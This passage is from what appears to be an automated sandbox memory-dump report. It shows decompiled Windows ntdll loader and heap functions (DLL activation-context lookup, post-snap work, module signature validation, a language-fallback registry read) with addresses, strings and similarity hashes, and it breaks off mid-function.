                    0x014c0494
                    0x00000000
                    0x014c049b
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                    • API String ID: 0-188067316
                    • Opcode ID: fe51f4dd15b682da054ea184d6a5c1673d04d3182e5da6c3b42768d0d2f6e6c4
                    • Instruction ID: f1d6ba58afae750d91a80c4e6dc1f239fcd19b1b31c8e053d396a4a6edc91875
                    • Opcode Fuzzy Hash: fe51f4dd15b682da054ea184d6a5c1673d04d3182e5da6c3b42768d0d2f6e6c4
                    • Instruction Fuzzy Hash: A1012D7B204691EFE369976A941DF93B7A8DB12F78F2A802FF004477718AB49840C116
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01498E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                    Download Yara Rule
                    C-Code - Quality: 44%
                    			E01498E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x155d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1558464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1555780 & 0x00000003) != 0) {
							E014E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1555780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E014AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1557984; // 0x11a2ca8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1558464; // 0x74790110
					 *0x155b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01499B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1555780 & 0x00000005) != 0) {
						_push(_t49);
						E014E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                    0x01498e0f
                    0x01498e16
                    0x01498e19
                    0x01498e1b
                    0x01498e21
                    0x01498e7f
                    0x01498e85
                    0x014d9354
                    0x014d936c
                    0x014d9371
                    0x014d937b
                    0x014d9381
                    0x014d9381
                    0x014d937b
                    0x01498e9d
                    0x01498e9d
                    0x01498e29
                    0x01498e2c
                    0x01498e38
                    0x01498e3e
                    0x01498e43
                    0x01498eb5
                    0x01498eb9
                    0x014d92aa
                    0x014d92af
                    0x014d92e8
                    0x014d92e8
                    0x014d92af
                    0x01498eb9
                    0x01498e45
                    0x01498e53
                    0x01498e5b
                    0x01498e5f
                    0x01498e78
                    0x01498e78
                    0x01498e7d
                    0x01498ec3
                    0x01498ecd
                    0x01498ed2
                    0x01498ed2
                    0x01498ec5
                    0x01498ec5
                    0x00000000
                    0x01498e7d
                    0x01498e67
                    0x01498ea4
                    0x014d931a
                    0x00000000
                    0x00000000
                    0x014d9320
                    0x01498ea4
                    0x01498e70
                    0x014d9325
                    0x014d9340
                    0x014d9345
                    0x014d9345
                    0x01498e76
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 014D932A
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 014D9357
                    • LdrpFindDllActivationContext, xrefs: 014D9331, 014D935D
                    • minkernel\ntdll\ldrsnap.c, xrefs: 014D933B, 014D9367
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: b0232fefbc897b05b55f735730d5647633fceca587d32992a4bfa960507a4d3c
                    • Instruction ID: 248b378ff69d163589352b8b690bd4bb338fa8b6fb96f5f98d1ba36cfd13a274
                    • Opcode Fuzzy Hash: b0232fefbc897b05b55f735730d5647633fceca587d32992a4bfa960507a4d3c
                    • Instruction Fuzzy Hash: 14411932A0031F9FEF356A5DC878A377EB4BB56268F06416BE914D72B1E7706C808381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 015249A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                    • API String ID: 2994545307-336120773
                    • Opcode ID: 7d145324adb83880e84eb9b89c8dd917166c3a60d25fd29b9882a270207d8227
                    • Instruction ID: 9f74bd0fb886b3f7ec39760f29d0b91ecac62a2d677bdba4f244a3351baa40f7
                    • Opcode Fuzzy Hash: 7d145324adb83880e84eb9b89c8dd917166c3a60d25fd29b9882a270207d8227
                    • Instruction Fuzzy Hash: 7031F573200120FFD310DB9AC885F6A77E9FF16A64F15846AF505DF2A1D7B0A884C759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01478794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                    Download Yara Rule
                    C-Code - Quality: 83%
                    			E01478794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0147934A() != 0) {
								_t159 = E014EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1555780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E014E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1555780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0147849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01478999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01478999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1555c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1555c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01482280(_t92, 0x15586cc);
															_t94 = E01539DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E014961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1555c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01478A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1555c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1555c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E014AF380(_t136, 0x1441184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01482280(_t108, 0x15586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E014961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01539D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0147FFB0(_t118, _t156, 0x15586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E014A9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                    0x01478799
                    0x0147879d
                    0x014787a1
                    0x014787a3
                    0x014787a8
                    0x014787c3
                    0x014787c3
                    0x014787c8
                    0x014787d1
                    0x014787d4
                    0x014787d8
                    0x014787e5
                    0x014787ec
                    0x014c9bfe
                    0x014c9c00
                    0x014c9c02
                    0x014c9c08
                    0x014c9c0d
                    0x014c9c0f
                    0x014c9c14
                    0x014c9c2d
                    0x014c9c32
                    0x014c9c37
                    0x014c9c3a
                    0x014c9c3c
                    0x014c9c42
                    0x014c9c42
                    0x014c9c3c
                    0x014c9c02
                    0x014787da
                    0x014787df
                    0x014787e3
                    0x00000000
                    0x00000000
                    0x014787e3
                    0x014787f2
                    0x00000000
                    0x014787fb
                    0x014787fd
                    0x014787fe
                    0x0147880e
                    0x0147880f
                    0x01478810
                    0x01478814
                    0x0147881a
                    0x0147881c
                    0x0147881f
                    0x01478821
                    0x01478822
                    0x01478824
                    0x01478826
                    0x0147882c
                    0x0147882e
                    0x014c9c48
                    0x014c9c48
                    0x01478834
                    0x01478834
                    0x01478837
                    0x00000000
                    0x00000000
                    0x01478837
                    0x0147882e
                    0x0147883d
                    0x01478840
                    0x01478843
                    0x01478846
                    0x01478849
                    0x0147884c
                    0x0147884e
                    0x01478850
                    0x01478852
                    0x01478854
                    0x01478857
                    0x014788b4
                    0x014788b6
                    0x014788b6
                    0x01478859
                    0x01478859
                    0x01478859
                    0x01478861
                    0x01478866
                    0x0147886a
                    0x0147893d
                    0x01478941
                    0x00000000
                    0x01478947
                    0x01478947
                    0x0147894a
                    0x0147894c
                    0x00000000
                    0x01478952
                    0x01478955
                    0x0147895a
                    0x0147895d
                    0x0147895d
                    0x0147895f
                    0x01478961
                    0x01478961
                    0x01478968
                    0x00000000
                    0x00000000
                    0x0147896a
                    0x0147896b
                    0x0147896e
                    0x00000000
                    0x01478970
                    0x01478970
                    0x01478970
                    0x01478970
                    0x01478972
                    0x01478972
                    0x01478974
                    0x00000000
                    0x0147897a
                    0x0147897a
                    0x0147897d
                    0x00000000
                    0x01478983
                    0x014c9c65
                    0x014c9c6d
                    0x014c9c72
                    0x014c9c75
                    0x014c9c75
                    0x014c9c82
                    0x014c9c86
                    0x014c9c87
                    0x014c9c88
                    0x014c9c89
                    0x014c9c8c
                    0x014c9c90
                    0x014c9c95
                    0x014c9c97
                    0x014c9ca0
                    0x014c9ca3
                    0x014c9ca9
                    0x014c9ca9
                    0x00000000
                    0x014c9ca9
                    0x014c9ca3
                    0x00000000
                    0x014c9c97
                    0x0147897d
                    0x00000000
                    0x01478974
                    0x01478988
                    0x01478992
                    0x01478996
                    0x00000000
                    0x01478996
                    0x0147894c
                    0x00000000
                    0x01478870
                    0x0147887b
                    0x0147887d
                    0x0147887f
                    0x01478881
                    0x01478884
                    0x01478884
                    0x01478886
                    0x01478889
                    0x0147888c
                    0x0147888e
                    0x01478891
                    0x01478891
                    0x01478898
                    0x00000000
                    0x00000000
                    0x0147889a
                    0x0147889b
                    0x0147889e
                    0x00000000
                    0x00000000
                    0x014788a0
                    0x014788a8
                    0x014788b0
                    0x014788b2
                    0x014788d3
                    0x014788d5
                    0x00000000
                    0x014788d7
                    0x014788db
                    0x014788dc
                    0x014788e0
                    0x014788e8
                    0x014788ee
                    0x014788f0
                    0x014788f3
                    0x014788fc
                    0x01478901
                    0x01478906
                    0x0147890c
                    0x0147890c
                    0x0147890f
                    0x01478916
                    0x01478917
                    0x01478918
                    0x01478919
                    0x0147891a
                    0x0147891f
                    0x01478921
                    0x014c9c52
                    0x014c9c55
                    0x014c9c5b
                    0x014c9cac
                    0x014c9cc0
                    0x014c9cc0
                    0x014c9c55
                    0x01478927
                    0x01478927
                    0x0147892f
                    0x01478933
                    0x00000000
                    0x014788f5
                    0x014788f5
                    0x00000000
                    0x014788f7
                    0x014788f7
                    0x014788fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014788fa
                    0x014788f5
                    0x014788f3
                    0x00000000
                    0x014788d5
                    0x00000000
                    0x014788b2
                    0x014788c9
                    0x00000000
                    0x014788c9
                    0x0147887f
                    0x0147886a
                    0x01478857
                    0x01478852
                    0x014788bf
                    0x014788bf
                    0x014787aa
                    0x014787ad
                    0x014787ae
                    0x014787b4
                    0x014787b5
                    0x014787b6
                    0x014787b8
                    0x014787bd
                    0x014787c1
                    0x014787f4
                    0x014787fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014787c1
                    0x00000000

                    Strings
                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 014C9C18
                    • minkernel\ntdll\ldrsnap.c, xrefs: 014C9C28
                    • LdrpDoPostSnapWork, xrefs: 014C9C1E
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                    • API String ID: 2994545307-1948996284
                    • Opcode ID: cd6ca045f92efccfadcf1e846d9d75fefcfcfd067a99dd7fb8a759f07f8aa41f
                    • Instruction ID: 9fc74867db72c6103752df3ab4fed9727f25751cefa9849bd2e0205e89ed6569
                    • Opcode Fuzzy Hash: cd6ca045f92efccfadcf1e846d9d75fefcfcfd067a99dd7fb8a759f07f8aa41f
                    • Instruction Fuzzy Hash: 88910371A00207EBEF18DF59C885AFABBB5FF94314B16416FD905AB261E730E905CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01477E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E01477E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0147CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0146C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1555780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E014E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1555780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01487D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01487D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E014E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01487D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01487D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E014E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0149A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0146B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                    0x01477e4c
                    0x01477e50
                    0x01477e55
                    0x01477e58
                    0x01477e5d
                    0x01477e71
                    0x01477f33
                    0x01477e77
                    0x01477e77
                    0x01477e79
                    0x01477e79
                    0x01477e7e
                    0x01477f45
                    0x014c9848
                    0x00000000
                    0x014c9848
                    0x01477f4e
                    0x01477f53
                    0x01477f5a
                    0x00000000
                    0x00000000
                    0x014c985a
                    0x014c9862
                    0x014c9866
                    0x00000000
                    0x014c986c
                    0x00000000
                    0x014c986c
                    0x01477e84
                    0x01477e84
                    0x01477e8d
                    0x014c9871
                    0x01477eb8
                    0x01477ec0
                    0x01477ec0
                    0x01477e9a
                    0x014c987e
                    0x00000000
                    0x00000000
                    0x014c9884
                    0x014c988b
                    0x014c98a7
                    0x014c98ac
                    0x014c98b1
                    0x014c98b6
                    0x014c98b8
                    0x014c98b8
                    0x014c98b9
                    0x00000000
                    0x014c98b9
                    0x01477ea0
                    0x01477ea7
                    0x00000000
                    0x00000000
                    0x01477eac
                    0x01477eb1
                    0x01477ec6
                    0x01477ed0
                    0x014c98cc
                    0x01477ed6
                    0x01477ed6
                    0x01477ed6
                    0x01477ede
                    0x01477ee3
                    0x014c98e3
                    0x014c98f0
                    0x014c9902
                    0x014c98f2
                    0x014c98fb
                    0x014c98fb
                    0x014c9907
                    0x014c991d
                    0x014c991d
                    0x014c9907
                    0x014c98e3
                    0x01477ef0
                    0x01477f14
                    0x01477f14
                    0x01477f1e
                    0x014c9946
                    0x01477f24
                    0x01477f24
                    0x01477f24
                    0x01477f2c
                    0x014c996a
                    0x014c9975
                    0x014c9975
                    0x014c997e
                    0x014c9993
                    0x014c9993
                    0x014c997e
                    0x00000000
                    0x01477ef2
                    0x01477efc
                    0x01477f0a
                    0x01477f0e
                    0x014c9933
                    0x00000000
                    0x014c9933
                    0x00000000
                    0x01477f0e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01477eb1

                    Strings
                    • LdrpCompleteMapModule, xrefs: 014C9898
                    • Could not validate the crypto signature for DLL %wZ, xrefs: 014C9891
                    • minkernel\ntdll\ldrmap.c, xrefs: 014C98A2
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                    • API String ID: 0-1676968949
                    • Opcode ID: 833ac48ebb72261a731072fffec525d8553fc02073c2c4379d9e336454e25f99
                    • Instruction ID: 0a6dc3f93bb321a7ed0d070dd7d0afd0ee3dc8f9c29c335f9ff13c658a9b3e86
                    • Opcode Fuzzy Hash: 833ac48ebb72261a731072fffec525d8553fc02073c2c4379d9e336454e25f99
                    • Instruction Fuzzy Hash: DC51F035600742EBE721CB6DC948BAB7BE4AB00725F540A6FE9519B3F1D734E901C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E0146E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0146F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E014A95D0();
						}
						if(_t78 != 0) {
							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E014AFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E014ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E014A9600();
					if(_t97 < 0) {
						goto L6;
					}
					E014ABB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0146F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E014ABB40(_t83, _t102 + 0x24, _t78);
								if(L014743C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
